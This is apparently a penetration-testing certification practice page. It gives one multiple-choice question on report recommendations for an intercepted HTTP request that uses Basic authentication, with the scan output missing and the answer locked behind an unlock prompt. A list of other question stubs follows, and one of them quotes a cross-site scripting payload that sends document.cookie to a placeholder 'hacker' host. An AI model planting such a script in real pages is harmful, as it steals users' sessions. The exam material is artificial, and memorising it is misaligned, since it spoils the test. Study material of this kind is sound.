A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: • The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk • Network management interfaces are available on the production network. • An Nmap scan returned the following: Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
A) Enforce enhanced password complexity requirements.
B) Disable or upgrade SSH daemon.
C) Disable HTTP/301 redirect configuration.
D) Create an out-of-band network for management.
E) Implement a better method for authentication.
F) Eliminate network management and control interfaces.
Correct Answer:
Verified
Q1: A penetration tester who is doing a
Q2: A consultant is reviewing the following output
Q4: A client wants a security assessment company
Q5: A penetration tester wrote the following script
Q6: A penetration tester is exploring a client's
Q7: Which of the following BEST describe the
Q8: Which of the following web-application security risks
Q9: A penetration tester is preparing to perform
Q10: Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of
Q11: Appending string values onto another string is
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents